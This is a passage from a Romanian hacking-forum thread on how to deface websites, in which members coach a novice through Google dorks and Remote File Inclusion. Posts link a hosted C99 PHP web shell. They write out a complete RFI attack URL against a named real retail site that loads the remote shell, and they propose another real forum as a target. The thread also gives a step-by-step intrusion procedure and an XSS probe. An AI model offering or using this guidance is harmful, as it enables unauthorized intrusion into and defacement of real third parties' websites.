Filehost.ro - gazduire fisiere
Hacking and more...
HaCkinG CulT
Nou pe simpatie:
glamour35
Femeie
24 ani
Constanta
cauta Barbat
28 - 69 ani
Hacking and more...ReguliInregistrareLoginPozeNu sunteti logat. Lista Forumurilor Pe Tematici
Hacking and more... / Deface /

Cum se deface un site sau un forum ???

Pagini:  1 2 3 Moderat de Shocker
#26
OSHO
Elite Member
Din: Cluj
Postari: 2069
@streptococ: asta e gluma sau tu chiar esti serios ? 

Come on, chestiile astea is char lame de tot. Daca site-ul nu e vulnerabil RFI ce ai facut ? Te opresti ? Atat ? Te dai batut daca nu e vulnerabil la RFI ? Daca nu e vulnerabil la RFI inseamna ca ai gasit un site hack-proof ?

Scuza-ma ca imi permit sa ma amuz pe seama ta dar te credeam mult mai "greu" in gandire.

@Maniak: uite, ai vazut ca a venit unul care sa-ti dea mura-n gura ?


_______________________________________

IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________

 
   
#27
Maniak
Junior+
Postari: 39
Acum de unde iau C99Shell care sa mearga si care sa nu fie text  ci sa fie cam ca aici http://img388.imageshack.us/img388/5003/c9928xp.jpg
Cu asta ma ajuta cineva ?????
OSHO - u chiar te pricepi ,te rog ajutama cu chesti asta !!!sau altcineva care se pricepe !!!!


 
   
#28
OSHO
Elite Member
Din: Cluj
Postari: 2069
Ia d'aici: http://popesculescu.lx.ro/c99.txt

_______________________________________

IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________

 
   
#29
Maniak
Junior+
Postari: 39
Dar OSHO  Cand intru pe site dc imi apara asa http://www19.rapidupload.com/d.php?file ... path=28614 ,nu ceva de felul asta http://img388.imageshack.us/img388/5003/c9928xp.jpg

 
   
#30
OSHO
Elite Member
Din: Cluj
Postari: 2069

Maniak a scris:

Dar OSHO  Cand intru pe site dc imi apara asa http://www19.rapidupload.com/d.php?file ... path=28614 ,nu ceva de felul asta http://img388.imageshack.us/img388/5003/c9928xp.jpg


Dupa cum ti s-a recomandat si mai sus, documenteaza-te. Cauta un tutorial de RFI ca sunt destule. O sa intelegi mult mai bine ce ai de facut.


_______________________________________

IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________

 
   
#31
streptococ
Master of 127.0.0.1
Postari: 158

OSHO a scris:

@streptococ: asta e gluma sau tu chiar esti serios ? 

Come on, chestiile astea is char lame de tot. Daca site-ul nu e vulnerabil RFI ce ai facut ? Te opresti ? Atat ? Te dai batut daca nu e vulnerabil la RFI ? Daca nu e vulnerabil la RFI inseamna ca ai gasit un site hack-proof ?

Scuza-ma ca imi permit sa ma amuz pe seama ta dar te credeam mult mai "greu" in gandire.

@Maniak: uite, ai vazut ca a venit unul care sa-ti dea mura-n gura ?



lol OSHO,eu i-am vorbit mai jos decat unui incepator dupa ce am vazut ca nu e in stare nici sa gaseasca un php shell si i am recomandat cea mai usoara metoda si cea mai folosita de toti lamerii , am incercat sa il fac sa intelega nu cum fac majoritatea ii insira 10 limbaje de programare si "go".
Crezi ca mai intelegea ceva daca ii insiram 10 metode  ?
Nu inteleg de ce te-ai amuzat ? probabil crezi ca doar atat stiu , sa folosesc un RFI.


_______________________________________
Retired !

 
   
#32
OSHO
Elite Member
Din: Cluj
Postari: 2069

streptococ a scris:

Crezi ca mai intelegea ceva daca ii insiram 10 metode  ?
Nu inteleg de ce te-ai amuzat ? probabil crezi ca doar atat stiu , sa folosesc un RFI.

Dude, nu o lua ca o ofensa. A fost doar o gluma. Citeste inca o data ce ai postat si incearca sa-ti dai seama ce intelege altul

Anyway, nu ma intelege gresit. Nu am incercat sa te subestimez sau sa insinuez ca nu ai stii altceva... doar ca mi s-a parut al naibi de amuzanta treaba la modul in care ai pus problema... parca si vedeam un slogan: "Vrei sa fi hacker ? G00gl3 d0rkz + RFI r00lz !" 


_______________________________________

IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________

 
   
#33
Maniak
Junior+
Postari: 39
OSH acum intelesei ce trebuia sa fac ex :   
LINCK SITE VURNERABIL:  /components/com_facileforms/facileforms.frame.php?ff_compath=


GOOGLE DORK: inurl"com_facileforms"

Shall :
http://popesculescu.lx.ro/c99.txt?

Cam asta trebe sa arata sitele cu toate chestiile astea    EX
:www.flanco.ro/components/com_facileforms/facileforms.frame.php?ff_compath=http://popesculescu.lx.ro/c99.txt?




Dar cum mai gasesc alt linc de sit vurnerabil


 
   
#34
OSHO
Elite Member
Din: Cluj
Postari: 2069

Maniak a scris:

Dar cum mai gasesc alt linc de sit vurnerabil

Poti folosi o tehnica folosita de lameri, adica google dorks. Asta se foloseste cand vrei sa demonstrezi ca esti lamer. Intri pe google si ii dai sa caute (asta e doar un exemplu): inurl:php?page=

Daca nu vrei sa fi lamer faci cateva teste sa vezi ca ai prins ideea si apoi pastrezi tehnica pentru cazul in care gasesti vreun site pe care vrei sa intri si care vezi ca e vulnerabil la RFI. Cea mai simpla metoda sa iti dai seama daca e vulnerabil la RFI e sa te uiti in URL. Daca vezi un nume de fisier in URL poti incerca sa incluzi C99 pentru ca e posibil sa fie RFI.
Alte metode de RFI o sa gasesti mai incolo... sa dai fisierele de incarcare prin POST sau prin COOKIE. Alea is chestii pentru care trebuie sa mai inveti putin (nu mult) ca sa le poti aplica si trebuie sa inveti destul de mult ca sa stii sa le gasesti.


_______________________________________

IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________

 
   
#35
rakon
Pe lista neagra
Postari: 261

streptococ a scris:

Ce dreq il puneti sa invete o gramada de limbaje de programare si de scripting cand el nu intelege cateva tehnici simple dar un limbaj. + pentru a face un deface nu iti trebuie absolut deloc cunostinte PHP iar mysql ..tu Sketch ai idee despre mysql ? iti spun eu nu ai nici o idee daca aveai nu ziceai ca tre sa stii mysql pentru a face un deface.
Pentru a face un deface poti sa ai si un IQ de 0,1.Tre doar sa stii 2 coduri html pentru deface si sa dai pe google dupa dork or sa scanezi cu scanner buguri RFI.
Mai citii mai sus unul de zicea de php,mysql,js,C,perl etc. o sumedenie de limbaje de programare si scripting pe care nu le-ar invata nici in 2 luni.Rakon tu ai inteles vreodata in viata ta un exploit ?

Maniak uite cum sta treaba pe intelesul tau.

1. cauta un bug [ sa fie Remote File Inclusion ] pe un site de securitate gen milw0rm,securityfocus,secunia etc.
2.vezi daca bugul are google dork daca nu ia numele softului afectat si versiunea si cauta pe google.
3.ai gasit cu google un soft cu versiunea afectata , acum e timpul sa incluzi php shellu in site`u vuln
4. ai obtinut acces la server
5. cauta unde ai drepturi de scriere si gata

unde e PHP`ul,MYSQL`u,C,Perl si toate cele ca sa penetrezi serveru` ?



Daca am inteles vreodata un exploit ? Da , am inteles . Dar uite , gasesti o vulnerabilitate in www.blabla.com , si nu exista exploit momentan pentru aceasta vulnerabilitate , atunci trebuie sa-ti faci tu propriul exploit , de aia spuneam de un limbaj de programare ( gen C ) . Asa , si cu limbajele de web , deoarece trebuie sa stii sa te si uiti prin codul sursa , sal intelegi , sa iti bagi nasul prin baza de date .

Calm dude 


 
   
#36
streptococ
Master of 127.0.0.1
Postari: 158
rakon stii ca exploiturile se scriu pe baza unor buguri, pentru ce iti trebuie sa codezi/folosesti exploit cand poti folosii bugul si fara ?

Dar uite , gasesti o vulnerabilitate in www.blabla.com , si nu exista exploit momentan pentru aceasta vulnerabilitate , atunci trebuie sa-ti faci tu propriul exploit

Habar n-ai ce e ala un exploit si cu ce se mananca ! Daca gasesti o vulnerabilitate te folosesti de ea si iti ridici nivelul de drepturi nu te apuci sa cauti/faci un exploit .Exploiturile sunt pentru cei grei de cap care nu inteleg cum sa exploatez o vulnerabilitate si prefera exploiturile ca sunt usor de folosit unde doar le executa,introduc url`ul la site-ul vuln si apoi pot executa comenzi doar din consola.
Nu zic ca exploiturile nu sunt folositoare,uneori chiar sunt necesare de exemplu pot executa aceeasi comanda de 999 ori [ adica repetata ] DAR nu cum crezi tu ca totul se rezulta la exploituri
Pe scurt: Daca stii sa folosesti un bug nu ai nevoie de exploit ! ! !

deoarece trebuie sa stii sa te si uiti prin codul sursa , sal intelegi , sa iti bagi nasul prin baza de date .

tipule lasa-te ca nu e de tine, daca taceai filozof ramaneai ! la paginile codate in PHP nu ai cum sa vezi codul sursa ! iar la celelalte nu prea te ar interesa codul  + daca webmasterul a folosit si un encoder gen Zend te poti uita la codul sursa ca la stele si nu vei intelege nimic

PS:
OSHO a scris:

"Vrei sa fi hacker ? G00gl3 d0rkz + RFI r00lz !" 

ala nu ii hacker , ci doar un amarat de lamer/defacer care polueaza internetul.


_______________________________________
Retired !

 
   
#37
Maniak
Junior+
Postari: 39
Alta tehnica de spart site ,in cazul ka sitele nu e vulnerabil RFT mai exista !?? Si cum se face ???? Ca tahnica asta cu RTF am prinso !!!!!

 
   
#38
the*O.n.E*AnaKonD
Little Kevin
Postari: 90

Maniak a scris:

Alta tehnica de spart site ,in cazul ka sitele nu e vulnerabil RFT mai exista !?? Si cum se face ???? Ca tahnica asta cu RTF am prinso !!!!!



RFT?? E clar ca ai inteles'o
Ps: citeste ce a scris OSHO mai sus


OSHO a scris:

sa dai fisierele de incarcare prin POST sau prin COOKIE. Alea is chestii pentru care trebuie sa mai inveti putin (nu mult) ca sa le poti aplica si trebuie sa inveti destul de mult ca sa stii sa le gasesti.


 
   
#39
Maniak
Junior+
Postari: 39
Mah poi cum mai gasesc si eu un bug care sa fie Remote File Inclusion cu tot cu google dork cu care sa sparg site ???

 
   
#40
OSHO
Elite Member
Din: Cluj
Postari: 2069

Maniak a scris:

Mah poi cum mai gasesc si eu un bug care sa fie Remote File Inclusion cu tot cu google dork cu care sa sparg site ???

Ai citit ce ti-am spus mai sus ? Adica eu iti spun ce ai de facut si apoi ma intrebi ce ai de facut... crezi ca o sa te mai ajute cineva daca vede ca nu citesti ce ti se spune ? 


_______________________________________

IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________

 
   
#41
hfhun
Elite Member
Postari: 593
Nu stiu de ce am eu impresia ca tu, Maniak, vrei doar sa spargi site-uri si sa le faci deface, nu sa inveti ceva serios.

_______________________________________
"Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for." - The Mentor - The hacker's manifesto

 
   
#42
Maniak
Junior+
Postari: 39
Nu vreau decat sa sparg siteuri si sa le fac deface ,vreu si sa invat si ceva serios !!!

 
   
#43
OSHO
Elite Member
Din: Cluj
Postari: 2069

Maniak a scris:

Nu vreau decat sa sparg siteuri si sa le fac deface ,vreu si sa invat si ceva serios !!!


http://www.cs.cf.ac.uk/Dave/C/ Spor la invatat ! Asta e intr-adevar ceva serios


_______________________________________

IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________

 
   
#44
Maniak
Junior+
Postari: 39
Merci mult OSHO chiar o sa invat ce mi-ai dat pentru ca ma descurc cu engleza !!!Dar mai am o nelamurire (ultima nelamurire ) pe care ai incercat tu mai sus sa imi explici dar nu am inteles : cum gasec un linc cu site vulnerabil, da si mie un exemplu de linck ca sa pot si eu sa gasesc !!!!!

 
   
#45
OSHO
Elite Member
Din: Cluj
Postari: 2069

Maniak a scris:

Merci mult OSHO chiar o sa invat ce mi-ai dat pentru ca ma descurc cu engleza !!!

That's good

Oricand ai nelamuriri legate de programare, intreaba. C-ul meu e cam ruginit ca nu l-am folosit de mult dar cred ca pot face fata intrebarilor


Maniak a scris:

cum gasec un linc cu site vulnerabil, da si mie un exemplu de linck ca sa pot si eu sa gasesc !!!!!

http://hacking.3xforum.ro/post/3574/1/G ... orks_RFI_/


_______________________________________

IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________

 
   
#46
Maniak
Junior+
Postari: 39
Buguri care sa fie Remote File Inclusion pentru a le sparge cu Shell se gasesc pentru orice site ???? Si pentru " Bulletin® Version 3.6.4 " siteul este www.craiovaforum.ro

 
   
#47
hackcrack
Little Kevin
Postari: 98
OSHO --> revin din nou cu problema mea cu scanatul. Am inteles de la tine ca nici un soft nu ar fi recomandat pentru scanat pentru ca lasa urme foarte mari in log, pana aici este clar. Intrebare mea este ce metoda sa folosesc ca sa vad ce vulnerabiitati are ??

_______________________________________


 
   
#48
OSHO
Elite Member
Din: Cluj
Postari: 2069
Well... dupa ce ai invatat bine metodele iti folosesti ochii :P

Cand vezi intr-un site ca toate URL-urile au forma index.php?pagina=contact.html nu iti mai trebuie nici un fel de program ca sa iti dai seama ca siteul ala (in majoritatea cazurilor) e vulnerabil RFI sau LFI. De asemenea, unde vezi un camp input care urmeaza sa fie prelucrat de server si rezultatul il vezi pe pagina urmatoare e destul sa adaugi acolo <script>alert('Bau bau !');</script> ca sa iti dai seama daca siteul e vulnerabil XSS sau nu. Exemple mai sunt, dar cred ca ai prins ideea


_______________________________________

IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________

 
   
#49
streptococ
Master of 127.0.0.1
Postari: 158
mai exista posibilitatea ca  , codul sa fie vuln la RFI dar totusi sa nu poti face nimic daca url fopen e setat 0ff in php.ini

_______________________________________
Retired !

 
   
#50
OSHO
Elite Member
Din: Cluj
Postari: 2069

streptococ a scris:

mai exista posibilitatea ca  , codul sa fie vuln la RFI dar totusi sa nu poti face nimic daca url fopen e setat 0ff in php.ini


Adica e LFI


_______________________________________

IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________

 
   
Pagini:  1 2 3  
Mergi la